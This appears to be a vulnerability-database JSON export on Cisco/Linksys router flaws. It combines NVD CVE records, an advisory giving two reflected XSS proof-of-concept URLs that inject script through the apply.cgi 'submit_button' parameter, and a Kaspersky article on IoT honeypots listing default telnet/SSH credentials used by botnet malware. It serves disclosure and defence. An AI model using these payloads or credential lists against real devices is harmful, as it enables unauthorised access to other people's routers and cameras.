["cpe:2.3:o:cisco:linksys_e4200_firmware:1.0.05:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:06:52", "description": "Cisco Linksys E4200 1.0.05 Build 7 devices contain a Clickjacking Vulnerability which allows remote attackers to obtain sensitive information.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 1.4}, "published": "2020-02-05T21:15:00", "title": "CVE-2013-2682", "type": "cve", "cwe": ["CWE-1021"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2682"], "modified": "2020-02-07T14:30:00", "cpe": ["cpe:/o:cisco:linksys_e4200_firmware:1.0.05"], "id": "CVE-2013-2682", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2682", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:cisco:linksys_e4200_firmware:1.0.05:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:06:52", "description": "Cisco Linksys E4200 1.0.05 Build 7 devices contain a Security Bypass Vulnerability which could allow remote attackers to gain unauthorized access.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-05T21:15:00", "title": "CVE-2013-2681", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2681"], "modified": "2020-02-07T14:40:00", "cpe": ["cpe:/o:cisco:linksys_e4200_firmware:1.0.05"], "id": "CVE-2013-2681", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2681", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:cisco:linksys_e4200_firmware:1.0.05:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:06:52", "description": "Cisco Linksys E4200 1.0.05 Build 7 routers contain a Local File Include Vulnerability which could allow remote attackers to obtain sensitive information or execute arbitrary code by sending a crafted URL request to the apply.cgi script using the submit_type parameter.", "edition": 5, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-04T15:15:00", "title": "CVE-2013-2678", "type": "cve", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2678"], "modified": "2020-02-07T14:23:00", "cpe": ["cpe:/o:cisco:linksys_e4200_firmware:1.0.05"], "id": "CVE-2013-2678", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2678", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:cisco:linksys_e4200_firmware:1.0.05:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:06:52", "description": "Cross-site Scripting (XSS) in Cisco Linksys E4200 1.0.05 Build 7 devices allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2020-02-06T21:15:00", "title": "CVE-2013-2684", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2684"], "modified": "2020-02-07T13:25:00", "cpe": ["cpe:/o:cisco:linksys_e4200_firmware:1.0.05"], "id": "CVE-2013-2684", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2684", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:cisco:linksys_e4200_firmware:1.0.05:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:21:09", "description": "", "published": "2013-07-10T00:00:00", "type": "packetstorm", "title": "Cisco Linksys E1200 / N300 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2679"], "modified": "2013-07-10T00:00:00", "id": "PACKETSTORM:122342", "href": "https://packetstormsecurity.com/files/122342/Cisco-Linksys-E1200-N300-Cross-Site-Scripting.html", "sourceData": "`Summary \n-------------------- \nSoftware : Cisco/Linksys Router OS \nHardware : E1200 N300 (others currently untested) \nVersion : 2.0.04 (others currently untested) \nWebsite : http://www.linksys.com \nIssue : Reflected XSS \nSeverity : Medium \nResearcher: Carl Benedict (theinfinitenigma) \n \nProduct Description \n-------------------- \nThe Cisco/Linksys E1200 N300 is a consumer-grade router, wireless access point, and 10/100 switch. \n \nDetails \n-------------------- \nThe apply.cgi page, which backs all HTML forms on the device, is vulnerable to reflected XSS via the 'submit_button' parameter. The vulnerability is caused due to a lack of input validation and poor/missing server side validation checks. This attack requires an authenticated session. This application uses HTTP basic authentication. Because of this, there is no session, which increases the likelihood of this attack being successful. \n \nSample URL #1 (HTTP GET request): \n \nhttp://192.168.1.1/apply.cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%20%27 \n \nSample URL #2 (HTTP GET request): \n \nhttp://192.168.1.1/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%20%27&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&switch_mode=0&hnap_devicename=Cisco10002&need_reboot=0&user_language=&wait_time=0&dhcp_start=100&dhcp_start_conflict=0&lan_ipaddr=4&ppp_demand_pppoe=9&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_demand_hb=9&wan_ipv6_proto=dhcp-tunnel&detect_lang=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&machine_name=Cisco10002&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1 \n \nHistory \n-------------------- \n04/26/2013 : Discovery \n04/27/2013 : Advisory released \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/122342/ciscolinksyse1200-xss.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:48", "bulletinFamily": "software", "cvelist": ["CVE-2013-2679"], "description": "\r\n\r\nMitre has assigned the following CVE for this issue:\r\n\r\nCVE-2013-2679\r\n\r\nOn Mon, Apr 29, 2013 at 12:27 AM, Carl Benedict\r\n<theinfinitenigma@gmail.com> wrote:\r\n> Summary\r\n> --------------------\r\n> Software : Cisco/Linksys Router OS\r\n> Hardware : E1200 N300 (others currently untested)\r\n> Version : 2.0.04 (others currently untested)\r\n> Website : http://www.linksys.com\r\n> Issue : Reflected XSS\r\n> Severity : Medium\r\n> Researcher: Carl Benedict (theinfinitenigma)\r\n>\r\n> Product Description\r\n> --------------------\r\n> The Cisco/Linksys E1200 N300 is a consumer-grade router, wireless access point, and 10/100 switch.\r\n>\r\n> Details\r\n> --------------------\r\n> The apply.cgi page, which backs all HTML forms on the device, is vulnerable to reflected XSS via the 'submit_button' parameter. The vulnerability is caused due to a lack of input validation and poor/missing server side validation checks. This attack requires an authenticated session. This application uses HTTP basic authentication. Because of this, there is no session, which increases the likelihood of this attack being successful.\r\n>\r\n> Sample URL #1 (HTTP GET request):\r\n>\r\n> http://192.168.1.1/apply.cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%20%27\r\n>\r\n> Sample URL #2 (HTTP GET request):\r\n>\r\n> http://192.168.1.1/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%20%27&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&switch_mode=0&hnap_devicename=Cisco10002&need_reboot=0&user_language=&wait_time=0&dhcp_start=100&dhcp_start_conflict=0&lan_ipaddr=4&ppp_demand_pppoe=9&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_demand_hb=9&wan_ipv6_proto=dhcp-tunnel&detect_lang=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&machine_name=Cisco10002&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1\r\n>\r\n> History\r\n> --------------------\r\n> 04/26/2013 : Discovery\r\n> 04/27/2013 : Advisory released\r\n>\r\n>\r\n> --\r\n> ?\r\n\r\n\r\n\r\n-- ?\r\n", "edition": 1, "modified": "2013-07-15T00:00:00", "published": "2013-07-15T00:00:00", "id": "SECURITYVULNS:DOC:29559", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29559", "title": "Re: Cisco/Linksys E1200 N300 Reflected XSS", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:52", "bulletinFamily": "software", "cvelist": ["CVE-2013-2679", "CVE-2013-3568"], "description": "Crossite request forgery, XSS, code execution in web administration interface.", "edition": 1, "modified": "2013-07-15T00:00:00", "published": "2013-07-15T00:00:00", "id": "SECURITYVULNS:VULN:13169", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13169", "title": "Linksys routers security vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "securelist": [{"lastseen": "2017-06-30T15:02:31", "bulletinFamily": "blog", "cvelist": ["CVE-2013-2678", "CVE-2014-9727", "CVE-2014-6271"], "description": "\n\nThere were a number of incidents in 2016 that triggered increased interest in the security of so-called IoT or 'smart' devices. They included, among others, the [record-breaking](<https://www.scmagazineuk.com/ovh-suffers-11tbps-ddos-attack/article/532197/>) DDoS attacks against the French hosting provider OVH and the US DNS provider Dyn. These attacks are known to have been launched with the help of a massive botnet made up of routers, IP cameras, printers and other devices.\n\nLast year the world also learned of a colossal botnet made up of [nearly five million routers](<http://uk.pcmag.com/talktalk/86457/news/bestbuy-hacker-apologies-for-talktalk-and-post-office-hack-b>). The German telecoms giant Deutsche Telekom also encountered router hacking after the devices used by the operator's clients became infected with [Mirai](<https://securelist.com/76954/is-mirai-really-as-black-as-its-being-painted/>). The hacking didn't stop at network hardware: security problems were also detected in smart [Miele dishwashers](<https://motherboard.vice.com/en_us/article/a-hackable-dishwasher-is-connecting-hospitals-to-the-internet-of-shit>) and [AGA stove](<https://www.pentestpartners.com/security-blog/iot-Aga-cast-iron-security-flaw/>)s. The 'icing on the cake' was the [BrickerBot](<https://techcrunch.com/2017/04/25/brickerbot-is-a-vigilante-worm-that-destroys-insecure-iot-devices/>) worm that didn't just infect vulnerable devices like most of its 'peers' but actually rendered them fully inoperable.\n\n[](<https://securelist.com/files/2017/06/IOT2017_Timeline_EN.png>)\n\nAccording to Gartner, there are currently over 6 billion IoT devices on the planet. Such a huge number of potentially vulnerable gadgets could not possibly go unnoticed by cybercriminals. As of May 2017, Kaspersky Lab's collections included several thousand different malware samples for IoT devices, about half of which were detected in 2017.\n\n[](<https://securelist.com/files/2017/06/IOT_malware_collection_EN.png>)\n\n_The number of IoT malware samples detected each year (2013 \u2013 2017)_\n\n## Threat to the end user\n\nIf there is an IoT device on your home network that is poorly configured or contains vulnerabilities, it could cause some serious problems. The most common scenario is your device ending up as part of a botnet. This scenario is perhaps the most innocuous for its owner; the other scenarios are more dangerous. For example, your home network devices could be used to perform illegal activities, or a cybercriminal who has gained access to an IoT device could spy on and later blackmail its owner \u2013 we have already heard of such things happening. Ultimately, the infected device can be simply broken, though this is by no means the worst thing that can happen. \n\n## The main problems of smart devices\n\n#### Firmware\n\nIn the best-case scenario, device manufacturers are slow to release firmware updates for smart devices. In the worst case, firmware doesn't get updated at all, and many devices don't even have the ability to install firmware updates.\n\nSoftware on devices may contain errors that cybercriminals can exploit. For example, the Trojan PNScan (Trojan.Linux.PNScan) attempted to hack routers by exploiting one of the following vulnerabilities:\n\n * CVE-2014-9727 for attacking Fritz!Box routers;\n * A vulnerability in HNAP (Home Network Administration Protocol) and the vulnerability CVE-2013-2678 for attacking Linksys routers;\n * ShellShock (CVE-2014-6271).\n\nIf any of these worked, PNScan infected the device with the [Tsunami](<https://threats.kaspersky.com/en/threat/Backdoor.Linux.Tsunami>) backdoor.\n\nThe Persirai Trojan exploited a vulnerability present in over 1000 different models of IP cameras. When successful, it could run arbitrary code on the device with super-user privileges. \n\nThere's yet another security loophole related to the [implementation of the TR-069 protocol](<https://isc.sans.edu/forums/diary/TR069+NewNTPServer+Exploits+What+we+know+so+far/21763/>). This protocol is designed for the operator to remotely manage devices, and is based on SOAP which, in turn, uses the XML format to communicate commands. A vulnerability was detected within the command parser. This infection mechanism was used in some versions of the Mirai Trojan, as well as in [Hajime](<https://securelist.com/78160/hajime-the-mysterious-evolving-botnet/>). This was how Deutsche Telekom devices were infected.\n\n### Passwords, telnet and SSH\n\nAnother problem is preconfigured passwords set by the manufacturer. They can be the same not just for one model but for a manufacturer's entire product range. Furthermore, this situation has existed for so long that the login/password combinations can easily be found on the Internet \u2013 something that cybercriminals actively exploit. Another factor that makes the cybercriminal's work easier is that many IoT devices have their telnet and/or SSH ports available to the outside world.\n\nFor instance, here is a list of login/password combinations that one version of the Gafgyt Trojan (Backdoor.Linux.Gafgyt) uses:\n\nroot | root \n---|--- \nroot | - \ntelnet | telnet \n!root | - \nsupport | support \nsupervisor | zyad1234 \nroot | antslq \nroot | guest12345 \nroot | tini \nroot | letacla \nroot | Support1234 \n \n## Statistics\n\nWe set up several honeypots (traps) that imitated various devices running Linux, and left them connected to the Internet to see what happened to them 'in the wild'. The result was not long in coming: after just a few seconds we saw the first attempted connections to the open telnet port. Over a 24-hour period there were tens of thousands of attempted connections from unique IP addresses.\n\n[](<https://securelist.com/files/2017/06/attacks.png>)\n\n_Number of attempted attacks on honeypots from unique IP addresses. January-April 2017._\n\nIn most cases, the attempted connections used the telnet protocol; the rest used SSH.\n\n[](<https://securelist.com/files/2017/06/telnet-ssh.png>)\n\n_Distribution of attempted attacks by type of connection port used. January-April 2017_\n\nBelow is a list of the most popular login/password combinations that malware programs use when attempting to connect to a telnet port:\n\n**User** | **Password** \n---|--- \nroot | xc3511 \nroot | vizxv \nadmin | admin \nroot | admin \nroot | xmhdipc \nroot | 123456 \nroot | 888888 \nroot | 54321 \nsupport | support \nroot | default \nroot | root \nadmin | password \nroot | anko \nroot | \nroot | juantech \nadmin | smcadmin \nroot | 1111 \nroot | 12345 \nroot | pass \nadmin | admin1234 \n \nHere is the list used for SSH attacks. As we can see, it is slightly different.\n\n**User** | **Password** \n---|--- \n**admin** | default \n**admin** | admin \n**support** | support \n**admin** | 1111 \n**admin** | \n**user** | user \n**Administrator** | admin \n**admin** | root \n**root** | root \n**root** | admin \n**ubnt** | ubnt \n**admin** | 12345 \n**test** | test \n**admin** | <Any pass> \n**admin** | anypass \n**administrator** | \n**admin** | 1234 \n**root** | password \n**root** | 123456 \n \nNow, let's look at the types of devices from which the attacks originated. Over 63% of them could be identified as DVR services or IP cameras, while about 16% were different types of network devices and routers from all the major manufacturers. 1% were Wi-Fi repeaters and other network hardware, TV tuners, Voice over IP devices, Tor exit nodes, printers and 'smart-home' devices. About 20% of devices could not be identified unequivocally.\n\n[](<https://securelist.com/files/2017/06/Infographic.png>)\n\n_Distribution of attack sources by device type. January-April 2017_\n\nMost of the IP addresses from which attempted connections arrived at our honeypots respond to HTTP requests. Typically, there are several devices using each IP address (NAT technology is used). The device responding to the HTTP request is not always the device that attacked our honeypot, though that is usually the case.\n\nThe response to such a request was a web page \u2013 a device control panel, some form of monitoring, or maybe a video from a camera. With this returned page, it is possible to try and identify the type of device. Below is a list of the most frequent headers for the web pages returned by the attacking devices:\n\n**HTTP Title** | **Device %** \n---|--- \nNETSurveillance WEB | 17.40% \nDVR Components Download | 10.53% \nWEB SERVICE | 7.51% \nmain page | 2.47% \nIVSWeb 2.0 - Welcome | 2.21% \nZXHN H208N V2.5 | 2.04% \nWeb Client | 1.46% \nRouterOS router configuration page | 1.14% \nNETSuveillance WEB | 0.98% \nTechnicolor | 0.77% \nAdministration Console | 0.77% \nM\u0413\u0456dem - Inicio de sesi\u0413\u0456n | 0.67% \nNEUTRON | 0.58% \nOpen Webif | 0.49% \nhd client | 0.48% \nLogin Incorrect | 0.44% \niGate GW040 GPON ONT | 0.44% \nCPPLUS DVR - Web View | 0.38% \nWebCam | 0.36% \nGPON Home Gateway | 0.34% \n \nWe only see a portion of the attacking devices at our honeypots. If we need an estimate of how many devices there are globally of the same type, dedicated search services like Shodan or ZoomEye can help out. They scan IP ranges for supported services, poll them and index the results. We took some of the most frequent headers from IP cameras, DVRs and routers, and searched for them in ZoomEye. The results were impressive: millions of devices were found that potentially could be (and most probably are) infected with malware. \n\nNumbers of IP addresses of potentially vulnerable devices: IP cameras and DVRs.\n\n**HTTP Title** | **Devices** \n---|--- \nWEB SERVICE | 2 785 956 \nNETSurveillance WEB | 1 621 648 \ndvrdvs | 1 569 801 \nDVR Components Download | 1 210 111 \nNetDvrV3 | 239 217 \nIVSWeb | 55 382 \n**Total** | **7 482 115** \n \nNumbers of IP addresses of potentially vulnerable devices: routers\n\n**HTTP Title** | **Devices** \n---|--- \nEltex NTP | 2 653 \nRouterOS router | 2 124 857 \nGPON Home Gateway | 1 574 074 \nTL-WR841N | 149 491 \nZXHN H208N | 79 045 \nTD-W8968 | 29 310 \niGate GW040 GPON ONT | 29 174 \n**Total** | **3 988 604** \n \nAlso noteworthy is the fact that our honeytraps not only recorded attacks coming from network hardware classed as home devices but also enterprise-class hardware.\n\nEven more disturbing is the fact that among all the IP addresses from which attacks originated there were some that hosted monitoring and/or device management systems with enterprise and security links, such as:\n\n * Point-of-sale devices at stores, restaurants and filling stations\n * Digital TV broadcasting systems\n * Physical security and access control systems\n * Environmental monitoring devices\n * **Monitoring at a seismic station in Bangkok **\n * **Industry-grade programmable microcontrollers **\n * **Power management systems**\n\nWe cannot confirm that it is namely these types of devices that are infected. However, we have seen attacks on our honeypots arriving from the IP addresses used by these devices, which means at least one or more devices were infected on the network where they reside.\n\n### Geography of infected devices\n\nIf we look at the geographic distribution of the devices with the IP addresses that we saw attacking our honeypots, we see the following:\n\n[](<https://securelist.com/files/2017/06/Attacks_by_countries_EN.png>)\n\n_Breakdown of attacking device IP addresses by country. January-April 2017_\n\nAs we mentioned above, most of the infected devices are IP cameras and DVRs. Many of them are widespread in China and Vietnam, as well as in Russia, Brazil, Turkey and other countries.\n\n### Geographical distribution of server IP addresses from which malware is downloaded to devices\n\nSo far in 2017, we have recorded over 2 million hacking attempts and more than 11,000 unique IP addresses from which malware for IoT devices was downloaded.\n\nHere is the breakdown by country of these IP addresses (Top 10):\n\n**Country** | **Unique IPs** \n---|--- \nVietnam | 2136 \nTaiwan, Province of China | 1356 \nBrazil | 1124 \nTurkey | 696 \nKorea, Republic of | 620 \nIndia | 504 \nUnited States | 429 \nRussian Federation | 373 \nChina | 361 \nRomania | 283 \n \nIf we rank the countries by the number of downloads, the picture changes:\n\n**Country** | **Downloads** \n---|--- \nThailand | 580267 \nHong Kong | 367524 \nKorea, Republic of | 339648 \nNetherlands | 271654 \nUnited States | 168224 \nSeychelles | 148322 \nFrance | 68648 \nHonduras | 36988 \nItaly | 20272 \nUnited Kingdom | 16279 \n \nWe believe that this difference is due to the presence in some of these countries of bulletproof servers, meaning it's much faster and easier to spread malware than it is to infect IoT devices.\n\n### Distribution of attack activity by days of the week\n\nWhen analyzing the activities of IoT botnets, we looked at certain parameters of their operations. We found that there are certain days of the week when there are surges in malicious activity (such as scanning, password attacks, and attempted connections).\n\n[](<https://securelist.com/files/2017/06/week.png>)\n\n_Distribution of attack activity by days of the week. April 2017_\n\nIt appears Monday is a difficult day for cybercriminals too. We couldn't find any other explanation for this peculiar behavior.\n\n## Conclusion\n\nThe growing number of malware programs targeting IoT devices and related security incidents demonstrates how serious the problem of smart device security is. 2016 has shown that these threats are not just conceptual but are in fact very real. The existing [competition in the DDoS market](<https://securelist.com/78285/ddos-attacks-in-q1-2017/>) drives cybercriminals to look for new resources to launch increasingly powerful attacks. The Mirai botnet has shown that smart devices can be harnessed for this purpose \u2013 already today, there are billions of these devices globally, and by 2020 their number will grow to 20-50 billion devices, according to predictions by analysts at different companies.\n\nIn conclusion, we offer some recommendations that may help safeguard your devices from infection:\n\n 1. Do not allow access to your device from outside of your local network, unless you specifically need it to use your device;\n 2. Disable all network services that you don't need to use your device;\n 3. If the device has a preconfigured or default password and you cannot change it, or a preconfigured account that you cannot deactivate, then disable the network services where they are used, or disable access to them from outside the local network.\n 4. Before you start using your device, change the default password and set a new strong password;\n 5. Regularly update your device's firmware to the latest version (when such updates are available).\n\nIf you follow these simple recommendations, you'll protect yourself from a large portion of existing IoT malware.", "modified": "2017-06-19T09:08:27", "published": "2017-06-19T09:08:27", "href": "https://securelist.com/honeypots-and-the-internet-of-things/78751/", "id": "SECURELIST:6FF73BA3D8BB759BAC6F6A8B20F0F19D", "title": "Honeypots and the Internet of Things", "type": "securelist", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
